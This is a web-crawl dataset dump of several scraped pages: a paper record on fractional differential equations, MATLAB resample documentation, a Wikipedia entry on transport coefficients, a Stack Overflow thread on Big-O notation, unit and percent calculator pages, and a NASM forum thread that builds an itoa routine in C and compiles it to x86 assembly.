URL
stringlengths
15
1.68k
text_list
sequencelengths
1
199
image_list
sequencelengths
1
199
metadata
stringlengths
1.19k
3.08k
https://chesterrep.openrepository.com/handle/10034/620595?show=full
[ "dc.contributor.author Yanzhi, Liu * dc.contributor.author Roberts, Jason A. * dc.contributor.author Yan, Yubin * dc.date.accessioned 2017-08-10T10:57:41Z dc.date.available 2017-08-10T10:57:41Z dc.date.issued 2017-10-09 dc.identifier.citation Yanzhi, L., Roberts, J., & Yan, Y. (2018). A note on finite difference methods for nonlinear fractional differential equations with non-uniform meshes. International Journal of Computer Mathematics, 95(6-7), 1151-1169. http://dx.doi.org/10.1080/00207160.2017.1381691 en dc.identifier.doi 10.1080/00207160.2017.1381691 dc.identifier.uri http://hdl.handle.net/10034/620595 dc.description This is an Accepted Manuscript of an article published by Taylor & Francis in International Journal of Computer Mathematics on 09/10/2017, available online: http://dx.doi.org/10.1080/00207160.2017.1381691 dc.description.abstract We consider finite difference methods for solving nonlinear fractional differential equations in the Caputo fractional derivative sense with non-uniform meshes. Under the assumption that the Caputo derivative of the solution of the fractional differential equation is suitably smooth, Li et al. \\lq \\lq Finite difference methods with non-uniform meshes for nonlinear fractional differential equations\\rq\\rq, Journal of Computational Physics, 316(2016), 614-631, obtained the error estimates of finite difference methods with non-uniform meshes. However the Caputo derivative of the solution of the fractional differential equation in general has a weak singularity near the initial time. In this paper, we obtain the error estimates of finite difference methods with non-uniform meshes when the Caputo fractional derivative of the solution of the fractional differential equation has lower smoothness. The convergence result shows clearly how the regularity of the Caputo fractional derivative of the solution affect the order of convergence of the finite difference methods. Numerical results are presented that confirm the sharpness of the error analysis. dc.language.iso en en dc.publisher Taylor & Francis en dc.relation.url https://www.tandfonline.com/doi/full/10.1080/00207160.2017.1381691 en dc.rights.uri http://creativecommons.org/licenses/by/4.0/ en dc.subject Nonlinear fractional differential equation en dc.subject Predictor-corrector method en dc.subject Error estimates en dc.subject Non-uniform meshes en dc.subject Trapezoid formula en dc.title A note on finite difference methods for nonlinear fractional differential equations with non-uniform meshes en dc.type Article en dc.identifier.eissn 1029-0265 dc.contributor.department Lvliang University; University of Chester en dc.identifier.journal International Journal of Computer Mathematics dc.date.accepted 2017-07-28 or.grant.openaccess Yes en rioxxterms.funder Unfunded en rioxxterms.identifier.project Unfunded en rioxxterms.version AM en rioxxterms.licenseref.startdate 2018-10-09 refterms.dateFCD 2019-07-15T09:55:35Z refterms.versionFCD AM refterms.dateFOA 2018-10-09T00:00:00Z html.description.abstract We consider finite difference methods for solving nonlinear fractional differential equations in the Caputo fractional derivative sense with non-uniform meshes. Under the assumption that the Caputo derivative of the solution of the fractional differential equation is suitably smooth, Li et al. \\lq \\lq Finite difference methods with non-uniform meshes for nonlinear fractional differential equations\\rq\\rq, Journal of Computational Physics, 316(2016), 614-631, obtained the error estimates of finite difference methods with non-uniform meshes. However the Caputo derivative of the solution of the fractional differential equation in general has a weak singularity near the initial time. In this paper, we obtain the error estimates of finite difference methods with non-uniform meshes when the Caputo fractional derivative of the solution of the fractional differential equation has lower smoothness. The convergence result shows clearly how the regularity of the Caputo fractional derivative of the solution affect the order of convergence of the finite difference methods. Numerical results are presented that confirm the sharpness of the error analysis. rioxxterms.publicationdate 2017-10-09\n\n\n### Files in this item\n\nName:\nliurobertsyan_2017_06_21.pdf\nSize:\n377.0Kb\nFormat:\nPDF\nRequest:\nMain article" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71392876,"math_prob":0.55126196,"size":4433,"snap":"2020-45-2020-50","text_gpt3_token_len":1044,"char_repetition_ratio":0.1715963,"word_repetition_ratio":0.672549,"special_character_ratio":0.24475524,"punctuation_ratio":0.17358491,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9577275,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-30T20:50:47Z\",\"WARC-Record-ID\":\"<urn:uuid:946f0a96-fb9e-4808-adb8-ff569e22883c>\",\"Content-Length\":\"32745\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:55d1805e-576d-4866-bb39-ce321a20d9d0>\",\"WARC-Concurrent-To\":\"<urn:uuid:81f6c877-f49d-4a14-acb5-e25850706ce5>\",\"WARC-IP-Address\":\"52.208.117.227\",\"WARC-Target-URI\":\"https://chesterrep.openrepository.com/handle/10034/620595?show=full\",\"WARC-Payload-Digest\":\"sha1:S63V2QRNHS4S6PWLEX2J37PB4TV7HZKR\",\"WARC-Block-Digest\":\"sha1:5QXGHUXEFMHCS563OW25JA7WUOBA6GQZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141486017.50_warc_CC-MAIN-20201130192020-20201130222020-00504.warc.gz\"}"}
https://www.mathworks.com/help/ident/ref/resample.html
[ "Documentation\n\nresample\n\nResample time-domain data by decimation or interpolation (requires Signal Processing Toolbox software)\n\nSyntax\n\nresample(data,P,Q)\nresample(data,P,Q,order)\n\nDescription\n\nresample(data,P,Q) resamples data such that the data is interpolated by a factor P and then decimated by a factor Q. resample(z,1,Q) results in decimation by a factor Q.\n\nresample(data,P,Q,order) filters the data by applying a filter of specified order before interpolation and decimation.\n\nInput Arguments\n\ndata\n\nName of time-domain iddata object. Can be input-output or time-series data.\n\nData must be sampled at equal time intervals.\n\nP, Q\n\nIntegers that specify the resampling factor, such that the new sample time is Q/P times the original one.\n\n(Q/P)>1 results in decimation and (Q/P)<1 results in interpolation.\n\norder\n\nOrder of the filters applied before interpolation and decimation.\n\nDefault: 10\n\nExamples\n\ncollapse all\n\nIncrease the sampling rate of data by a factor of 1.5 and compare the resampled and the original data signals.\n\nu = idinput([20 1 2],'sine',[],[],[5 10 1]);\nu = iddata([],u,1);\nplot(u)\nur = resample(u,3,2);\nplot(u,ur)", null, "Algorithms\n\nIf you have installed the Signal Processing Toolbox™ software, resample calls the Signal Processing Toolbox resample function. The algorithm takes into account the intersample characteristics of the input signal, as described by data.InterSample.", null, "" ]
[ null, "https://www.mathworks.com/help/examples/ident/win64/ResampleTimedomainDataExample_01.png", null, "https://www.mathworks.com/images/nextgen/callouts/bg-trial-arrow_02.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7298221,"math_prob":0.9938227,"size":1073,"snap":"2019-43-2019-47","text_gpt3_token_len":255,"char_repetition_ratio":0.15809168,"word_repetition_ratio":0.0,"special_character_ratio":0.19664492,"punctuation_ratio":0.14009662,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99282056,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-18T02:04:30Z\",\"WARC-Record-ID\":\"<urn:uuid:53081455-911b-424d-a167-4bef19bf3c14>\",\"Content-Length\":\"66676\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e09c1ce7-1765-41be-a546-ee8104a1b773>\",\"WARC-Concurrent-To\":\"<urn:uuid:39eab88c-7624-45bc-87a7-5721fe2faff9>\",\"WARC-IP-Address\":\"23.50.112.17\",\"WARC-Target-URI\":\"https://www.mathworks.com/help/ident/ref/resample.html\",\"WARC-Payload-Digest\":\"sha1:LTVCN6RDSV7SCS3EDAUNBJDO3XK5WIA6\",\"WARC-Block-Digest\":\"sha1:FVLQRD3CTRO3PVRQTFWYVW46IQBINIOX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986677412.35_warc_CC-MAIN-20191018005539-20191018033039-00476.warc.gz\"}"}
https://en.m.wikipedia.org/wiki/Transport_coefficient
[ "# Transport coefficient\n\nA transport coefficient $\\gamma$", null, "measures how rapidly a perturbed system returns to equilibrium.\n\nThe transport coefficients occur in transport laws ${\\mathbf {J} {_{k}}}\\,=\\,\\gamma _{k}\\,\\mathbf {X} {_{k}}$", null, "where:\n\n${\\mathbf {J} {_{k}}}$", null, "is a flux of the property $k$", null, "the transport coefficient $\\gamma _{k}$", null, "of this property $k$", null, "${\\mathbf {X} {_{k}}}$", null, ", the gradient force which acts on the property $k$", null, ".\n\nTransport coefficients can be expressed via a Green–Kubo relation:\n\n$\\gamma =\\int _{0}^{\\infty }\\langle {\\dot {A}}(t){\\dot {A}}(0)\\rangle \\,dt,$", null, "where $A$", null, "is an observable occurring in a perturbed Hamiltonian, $\\langle \\cdot \\rangle$", null, "is an ensemble average and the dot above the A denotes the time derivative. For times $t$", null, "that are greater than the correlation time of the fluctuations of the observable the transport coefficient obeys a generalized Einstein relation:\n\n$2t\\gamma =\\langle |A(t)-A(0)|^{2}\\rangle .$", null, "In general a transport coefficient is a tensor." ]
[ null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a223c880b0ce3da8f64ee33c4f0010beee400b1a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/b09de9f10e22e356174304040bbd37e70175f806", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/6186e56b4c5da6fb2e3fa4b013ce728dc1fa7c46", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c3c9a2c7b599b37105512c5d570edc034056dd40", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2fe92cc350733480812673fa7deeaf7ad0bf70f1", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c3c9a2c7b599b37105512c5d570edc034056dd40", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/e5b522b429363c03fadb8938e5a8c6a58832066d", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c3c9a2c7b599b37105512c5d570edc034056dd40", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/c541755a9065805b370e452930928114b33bb8e3", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7daff47fa58cdfd29dc333def748ff5fa4c923e3", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/47e28d0cdb6d5e1c9af01324e09276f06e4d44c2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/65658b7b223af9e1acc877d848888ecdb4466560", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/2db64d662d2f733aefae2c5060cc0a2cba54d4b2", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7467498,"math_prob":0.99950945,"size":1211,"snap":"2020-10-2020-16","text_gpt3_token_len":244,"char_repetition_ratio":0.16818558,"word_repetition_ratio":0.0,"special_character_ratio":0.19653179,"punctuation_ratio":0.10471204,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99997544,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,1,null,1,null,null,null,null,null,null,null,1,null,null,null,1,null,null,null,null,null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-08T16:53:36Z\",\"WARC-Record-ID\":\"<urn:uuid:37eaa4dc-2dd9-4f16-a088-12c495e12515>\",\"Content-Length\":\"40495\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9248aa0c-b8fb-47d6-919c-e1938b08ad4b>\",\"WARC-Concurrent-To\":\"<urn:uuid:880eafc2-6922-4215-a920-23b748117485>\",\"WARC-IP-Address\":\"208.80.154.224\",\"WARC-Target-URI\":\"https://en.m.wikipedia.org/wiki/Transport_coefficient\",\"WARC-Payload-Digest\":\"sha1:BNQDYKTACZRTK7BY6AID55LH3ZSHSBJU\",\"WARC-Block-Digest\":\"sha1:FRG5BBPMZM4HS5LKI6L22IZT3SDRTDE3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371818008.97_warc_CC-MAIN-20200408135412-20200408165912-00328.warc.gz\"}"}
https://stackoverflow.com/questions/4065881/worst-case-vs-on/4065890
[ "# Worst case vs O(n)\n\nIs there a difference between statement \"Worst case running time of an Algorithm A\" and \"Running time of an Algorithm A is O(n)\"?\n\nWhat I think \"there is no difference\" because, worst case is the peak running time that the function can take, O(n) means that the function is \"bounded by\". Both give the same meaning.\n\nHope my logic is correct.\n\nThere is difference.\n\nAn algorithm is O(f) is not precise: you must say an alogirthm is O(f) in its best/worst/avarage case. You can say that is O(f) when best, worst and avarage are the same, but that's not so common.\n\n• I think it's pretty common that the average case and worst case have the same Big-O (IE, Heap Sort, Merge Sort, Radix Sort, most searches, etc). The only time you ever see worst case different from average case, is if the algorithm is susceptible to some datasets (IE. median-of-3 killer for quicksort). Nov 1 '10 at 1:13\n• @KendallHopkins Any container that can resize is going to give you a vastly different worst-case vs. average value. An `ArrayList` (in Java; Python `list`, Ruby `Array` and others function similarly) gives you amortized O(1) appends, but if you happen to be the lucky append that triggers a resize, you're going to get a (relatively) much slower response than the average case. Oct 4 '11 at 13:34\n\nI agree with your sentiment, but there are common algorithms (quicksort for instance) that have an expected time much better than their worst case time. You could claim quicksort is O(N^2) worst case, but you still expect it to be O(N*log N) almost always (at least for a good implementation).\n\nIt also gets complicated with algorithms that have amortized behavior. You might get O(N) or O(log N) for one particular operation, but many operations in a row will always be O(1) in the amortized sense. Splay trees and Finger trees are good examples in this category.\n\nRunning time as an absolute measure is usually less important than how that time increases when you add more data. For example, an algorithm that always takes 5 seconds to process 100 items, 10 seconds to process 200 items and so on, is said to be O(N) since the running time increases linearly with the dataset size. If a second algorithm took 5*5 = 25 seconds to process those 200 items instead, it might be classed as O(N^2). There's no \"peak running time\" here, since the running time always increases when you throw more data at it.\n\nIn fact, big O is an upper bound - so you could say the first algorithm was O(N^2) as well (if N is an upper bound, N*N is higher and hence also an upper bound, albeit a looser one). Common notation to denote other bounds includes Ω (omega, lower bound) and Θ (theta, simultaneous lower and upper bound).\n\nSome algorithms (for instance, Quicksort) exhibit different behaviour depending on the data fed to it - hence the worst case is O(N^2) even though it usually behaves as if it were O(N log N).\n\nThere is a huge difference between those strings of words. \"Worst case running time of an Algorithm A\" is a noun clause, it makes no statement at all. \"Running time of Algorithm A is O(n)\" is a sentence, telling us something about A.\n\n• Sorry, but when both the title and the body of the question make the same \"mistake\", it isn't obvious to me that it's a typo. I was simply answering the question asked. Nov 1 '10 at 0:17\n• Fair enough. You should suggest that he fix the wording so as not to confuse people like yourself. Your answer is really unlikely to be relevant once the wording is fixed. Nov 1 '10 at 0:23" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95695275,"math_prob":0.938236,"size":1034,"snap":"2021-43-2021-49","text_gpt3_token_len":247,"char_repetition_ratio":0.11941747,"word_repetition_ratio":0.0,"special_character_ratio":0.24564797,"punctuation_ratio":0.08411215,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9792647,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T13:05:51Z\",\"WARC-Record-ID\":\"<urn:uuid:464bbe4c-59a1-4212-a96e-b71346a6cf10>\",\"Content-Length\":\"194996\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a873039f-eda6-4551-87c7-6cbfc22cff24>\",\"WARC-Concurrent-To\":\"<urn:uuid:df1a9259-1508-4ca2-bd71-09c3af0be726>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://stackoverflow.com/questions/4065881/worst-case-vs-on/4065890\",\"WARC-Payload-Digest\":\"sha1:OU64MJNV6C3PKP23QWYO6S3GKL4TW3BA\",\"WARC-Block-Digest\":\"sha1:OKV3XTDQNIZA5ZVEFLVKWS5GXEF7HR5Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587877.85_warc_CC-MAIN-20211026103840-20211026133840-00150.warc.gz\"}"}
https://www.quizzes.cc/calculator/cm-feet/613
[ "### Convert 613 Centimeters to Feet and Inches\n\nHow much is 613 cm in feet and inches? Use this calculator to convert 613 centimeters to feet and inches. Change the values in the calculator below to determine a different amount. Height is commonly referred to in cm in some countries and feet and inches in others. This calculates from 613cm to feet and inches.\n\n### Summary\n\nConvert from Feet and Inches\nUse this calculator to convert six hundred and thirteen CMs to other measuring units.\nHow big is 613 cm in feet and inches? 613 cm = 20'1.34\nHow many meters is that? How high is that? How much? How big? How far is it? How tall is 613centimeters in feet and inches? How tall am I in feet and inches?\n\nWhat is the inch to cm conversion? How many inches in a centimeter? 1 cm = .3937007874 inches" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9148079,"math_prob":0.920401,"size":749,"snap":"2022-27-2022-33","text_gpt3_token_len":186,"char_repetition_ratio":0.18791947,"word_repetition_ratio":0.05839416,"special_character_ratio":0.26435247,"punctuation_ratio":0.11392405,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98995984,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-13T09:41:08Z\",\"WARC-Record-ID\":\"<urn:uuid:7a7b4fb2-0e79-44f7-bae8-d6e8635b222e>\",\"Content-Length\":\"5696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2e73942a-0c34-4055-9602-bc7032e45aca>\",\"WARC-Concurrent-To\":\"<urn:uuid:3a0fb7d4-7c78-4b2a-ad7d-5e8373b2899c>\",\"WARC-IP-Address\":\"3.93.199.172\",\"WARC-Target-URI\":\"https://www.quizzes.cc/calculator/cm-feet/613\",\"WARC-Payload-Digest\":\"sha1:5WFCFQ7HHZZGOSMHH3KZNVRLP6YEETS2\",\"WARC-Block-Digest\":\"sha1:IMJFSBZKPDNP6YPDKZHXLCGAODTZ2GF2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571911.5_warc_CC-MAIN-20220813081639-20220813111639-00730.warc.gz\"}"}
https://percent.info/ratio-to-percent/what-is-1-63-as-a-percent.html
[ "1:63 as a percent", null, "This page shows you in detail how to convert the ratio of 1:63 to a percent (1:63 as a percent). Details include step-by-step instructions and explanations.\n\nStep 1) Convert ratio to fraction.\nTo convert the ratio 1:63 to a fraction, you replace the colon with a fraction line, like this:\n\n1:63  =\n 1 63\n\nStep 2) Solve for x, fraction = x/100.\nYou don't want 1 per 63, but x per 100 (because percent means per hundred). Therefore, set up the fraction from Step 1 equal to x/100 and solve for x.\n\n 1 63\n=\n x 100\n\nx ≈ 1.5873\n\nThat was the 2nd and final step. Below is the answer to the ratio 1:63 as a percent.\n\n1:63 ≈ 1.5873%\n\nWhen we converted the 1:63 ratio to percent above, we showed you the math in detail so you would understand the math behind the answer.\n\nNow that you know the math, you may have noticed that all you have to do to convert a ratio to a percent is to multiply the left side of the colon by 100, and then divide the quotient you get by the right side of the colon. Here is the math:\n\n(1 × 100) / 63 ≈ 1.5873%\n\nRatio to Percent Converter\nGet step-by-step percent to ratio instructions for another ratio.\n\n:\n\n1:64 as a percent\nGo here for the next ratio to percent lesson in our database." ]
[ null, "https://percent.info/images/ratio-to-percent.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9115691,"math_prob":0.99060136,"size":1181,"snap":"2022-40-2023-06","text_gpt3_token_len":320,"char_repetition_ratio":0.16567545,"word_repetition_ratio":0.0,"special_character_ratio":0.3022862,"punctuation_ratio":0.12222222,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999331,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T22:44:47Z\",\"WARC-Record-ID\":\"<urn:uuid:302e8149-7300-4568-beeb-61492a4456ab>\",\"Content-Length\":\"7451\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:07314aff-1b34-4f70-bde4-e1bdd20b4dae>\",\"WARC-Concurrent-To\":\"<urn:uuid:20c0bdef-56f5-49ca-b1cd-517b46c6589b>\",\"WARC-IP-Address\":\"18.154.227.7\",\"WARC-Target-URI\":\"https://percent.info/ratio-to-percent/what-is-1-63-as-a-percent.html\",\"WARC-Payload-Digest\":\"sha1:GWT65JHVPYGLCYYA2YENOHZZJW2LGW4J\",\"WARC-Block-Digest\":\"sha1:U5F67QKP6OEABEXMQNRVMSSRCCANBAXC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499891.42_warc_CC-MAIN-20230131222253-20230201012253-00131.warc.gz\"}"}
https://forum.nasm.us/index.php?topic=2861.0;prev_next=prev
[ "###", null, "Author Topic: One example using C to build an assembly routine.  (Read 185 times)\n\n####", null, "fredericopissarra\n\n• Full Member\n•", null, "", null, "• Posts: 268\n• Country:", null, "", null, "##### One example using C to build an assembly routine.\n« on: October 28, 2022, 12:37:05 PM »\nI've got more or less 37 years of experience in x86 assembly and C language. The way I see, C is nothing more than \"high level\" assembly and, to me, it makes perfect sense to develop assembly routines using C.\n\nNowadays, good C compilers (GCC, Clang, Intel C++, but not MSVC++!), using optimization options, create a very good code indeed, taking advantage of lots of characteristics about your processor, avoiding branch mispredictions, caches mismatches and other exoteric things.\n\nHere's an example of the famous (and not ISO 9899 standard function) itoa() function (modified just to use base 10). I'll show you 4 ways to do it.\n\nFirst, itoa1.c, writes each algarism to the pointed buffer and, in the end, reverse the string:\nCode: [Select]\n`// itoa1.cchar *itoa10( char *p, int x ){  char buffer;  char *q, *r;  _Bool negative;  r = p;                    // We'll need this copy later.  q = buffer;               // Pointer to write individual algarisms in ASCII.  negative = x < 0;         // Flag: x is negative?  // Calc absulute value of x.  // FIXME: There's a problem here.  if ( negative )    x = -x;  // Convert each decimal algarism, forward.  do    *q++ = '0' + x % 10;  while ( x /= 10 );  // Put an extra '-' if x is negative.  if ( negative )    *q++ = '-';  *q-- = '\\0';  // copy string in reverse to buffer pointed by p.  while ( q >= buffer )    *p++ = *q--;  *p = '\\0';    return r;}`Why 12 chars in the local buffer? Because INT_MIN is -2147483648 (11 chars), plus the '\\0' at the end of the string.\n\nHere we got 2 problems. The first I did it on purpose to show we have to be careful when creating any routine. If x is INT_MIN, there is no way to negate it, using 2's complement. This can be fixed making a copy of x to a more precise (bigger type, as in long long int) and, then, negate it, if necessary. The second problem is the string reversal, copying the local buffer to the buffer pointed by the argument. Here we have, still, a third problem: The need for local buffer! It is unecessary, as described below, in a better implementation:\nCode: [Select]\n`// itoa2.cchar *itoa10( char *p, int x ){  // Since -INT_MIN cannot be represented on an 'int', we  // use better precision to hold the value (long long int is 64 bits long).  long long int n;  char *q, *r;  _Bool negative;  negative = x < 0;  n = llabs( x );  // We'll need r later to calculate the string length.  // 12 is used here because INT_MIN is \"-2147483648\"  // (11 chars), plus the extra '\\0'.  // Here the pointers point 1 char after the end of the  // buffer.  q = r = p + 12;  *--q = '\\0';  // Convert each decimal algarism, backwards.  do    *--q = '0' + n % 10;  while ( n /= 10 );  // Put an extra '-' if x is less then zero.  if ( negative )    *--q = '-';  // q points to the first char we have on buffer.  // Copy converted string to the beginning of the target buffer.  // This works because there are, at least, 2 bytes to move.  memmove( p, q, r - q );  return p;}`Here we got rid of the local buffer, using the argument p as the target buffer and we got rid of the string reversal as well. But, yet, we have one loop and one \"movement\" of bytes in the target buffer. The final movement is needed because your buffer pointed by p must begin with the string converted. The clock cycles wasted by memmove() depends on r - q bytes moved.\n\nThis seems to be better then the previous, but we can \"improve\" this by calculating how many chars will be in the final buffer. We can do this using 10's base logarithm of absolute value of x (if x != 0). This should improve the routine as we get rid of the final copy, but the number of tests to make a modified version of ilog10() to work will waste, more of less, the same number of clock cycles of the final movement. This third routine can be like this:\nCode: [Select]\n`// itoa3.c// Modified log10 for integers.// Used to get the number of chars in the buffer.static int ilog10_( unsigned int x ){  static const unsigned int v[] =  { 1000000000U, 100000000U, 10000000U, 1000000U, 100000U, 10000U, 1000U, 100U, 10U };  /* ilog10_(0) doesn't exist!     this is checking in itoa10() routine.  */  //if ( ! x )  //  return -1;  for ( int i = 0; i < sizeof v / sizeof v; i++ )    if ( x >= v[i] )      return 9 - i;  return 0;}char *itoa10( char *p, int x ){  // Since -INT_MIN cannot be represented on an 'int', we  // use better precision to hold the value (long long int is 64 bits long).  long long int n;  char *q;  _Bool negative;  negative = x < 0;  n = llabs( x );  // We have, at least, 2 chars ocuppied in the buffer:  //  '0' and '\\0'.  q = p + 2;  // ilog10() isn't defined for 0, so the test is necessary.  if ( x )    q += ilog10_( n ) + negative;  *--q = '\\0';  // Convert each decimal algarism backwards.  do    *--q = '0' + n % 10;  while ( n /= 10 );  // Put an extra '-' if x is less then zero.  if ( negative )    *--q = '-';  return p;}`We can tweak ilog10_() to improve the timing if, most of the time, we'll convert small values.\n\nBut I think the version of itoa2.c is better then this, in terms of performance (must measure!).\n\n####", null, "fredericopissarra\n\n• Full Member\n•", null, "", null, "• Posts: 268\n• Country:", null, "", null, "##### Re: One example using C to build an assembly routine.\n« Reply #1 on: October 28, 2022, 12:40:39 PM »\nWe can avoid the loops using SWAR, but more work must be made to this routine to work the same way we did before:\nCode: [Select]\n`// itoa_swar.c// credit: Paul Khuongstatic uint64_t encode_ten_thousands(uint64_t hi, uint64_t lo) {  uint64_t merged = hi | (lo << 32);  uint64_t top = ((merged * 10486ULL) >> 20) & ((0x7FULL << 32) | 0x7FULL);  uint64_t bot = merged - 100ULL * top;  uint64_t hundreds;  uint64_t tens;  hundreds = (bot << 16) + top;  tens = (hundreds * 103ULL) >> 10;  tens &= (0xFULL << 48) | (0xFULL << 32) | (0xFULL << 16) | 0xFULL;  tens += (hundreds - 10ULL * tens) << 8;  return tens;}// credit: Paul Khuongstatic void to_string_khuong(uint64_t x, char *out) {  uint64_t *p = (uint64_t *)out;  uint64_t top = x / 100000000;  uint64_t bottom = x % 100000000;  uint64_t first =      0x3030303030303030ULL + encode_ten_thousands(top / 10000, top % 10000);  uint64_t second =      0x3030303030303030ULL + encode_ten_thousands(bottom / 10000, bottom % 10000);  *p++ = first;  *p = second;}__attribute__((noinline))char *itoa10( char *p, int x ){  long long int n;  n = llabs( x );    if ( x < 0 )    p++;  to_string_khuong( n, p );  if ( x < 0 )    *--p = '-';  return p;}`This is as fast as we can expect, but if you convert something as \"-1234\" you'll get \"-0000000000001234\".\n\n####", null, "fredericopissarra\n\n• Full Member\n•", null, "", null, "• Posts: 268\n• Country:", null, "", null, "##### Re: One example using C to build an assembly routine.\n« Reply #2 on: October 28, 2022, 12:53:49 PM »\nNow... how can we \"convert\" one of those C implementations to assembly: Easy, use this command line:\n\n\\$ cc -O2 -masm=intel -S -march=native \\\n-fomit-frame-pointer -fcf-protection=none itoa2.c -o itoa2.s\n\nThe generated code (with some instructions reordering made by me and syntax adapted to NASM syntax) is very good but not perfect (from assembly point of view):\nCode: [Select]\n`itoa10:  mov   ecx, esi  sub   rsp, 8        ; Here because we're using memmove call.                      ; So, no red zone!  mov   r8, rdi  mov   r9d, esi  mov   BYTE [rdi+11], 0  lea   r11, [rdi+12]  lea   rsi, [rdi+11]  mov   rdi, -3689348814741910323  neg   ecx  cmovs ecx, esi  mov   ecx, ecx  align 4.loop:  mov   rax, rcx  mov   r10, rsi  sub   rsi, 1  mul   rdi  shr   rdx, 3  lea   rax, [rdx+rdx*4]  add   rax, rax  sub   rcx, rax  ; Here RDX = n / 10, RCX = n % 10  add   ecx, '0'  mov   [rsi], cl  mov   rcx, rdx  test  rdx, rdx    ; quotient is zero?  jne   .loop       ; no, stay in the loop.  ; Put '-' if x is negative.  test  r9d, r9d  jns   .not_negative  mov   BYTE [rsi-1], '-'  lea   rsi, [r10-2].not_negative:  mov   rdx, r11  mov   rdi, r8  sub   rdx, rsi  call  memmove wrt .plt  add   rsp, 8  ret`It's not an ideal code, since we can avoid memmove() call and use the red zone. The rest of the code seems pretty good and not so easy to improve.\n« Last Edit: October 28, 2022, 12:57:30 PM by fredericopissarra »" ]
[ null, "https://forum.nasm.us/Themes/default/images/topic/normal_post.gif", null, "https://forum.nasm.us/Themes/default/images/useroff.gif", null, "https://forum.nasm.us/Themes/default/images/star.gif", null, "https://forum.nasm.us/Themes/default/images/star.gif", null, "https://forum.nasm.us/Themes/default/images/flags/br.png", null, "https://forum.nasm.us/Themes/default/images/post/xx.gif", null, "https://forum.nasm.us/Themes/default/images/useroff.gif", null, "https://forum.nasm.us/Themes/default/images/star.gif", null, "https://forum.nasm.us/Themes/default/images/star.gif", null, "https://forum.nasm.us/Themes/default/images/flags/br.png", null, "https://forum.nasm.us/Themes/default/images/post/xx.gif", null, "https://forum.nasm.us/Themes/default/images/useroff.gif", null, "https://forum.nasm.us/Themes/default/images/star.gif", null, "https://forum.nasm.us/Themes/default/images/star.gif", null, "https://forum.nasm.us/Themes/default/images/flags/br.png", null, "https://forum.nasm.us/Themes/default/images/post/xx.gif", null ]
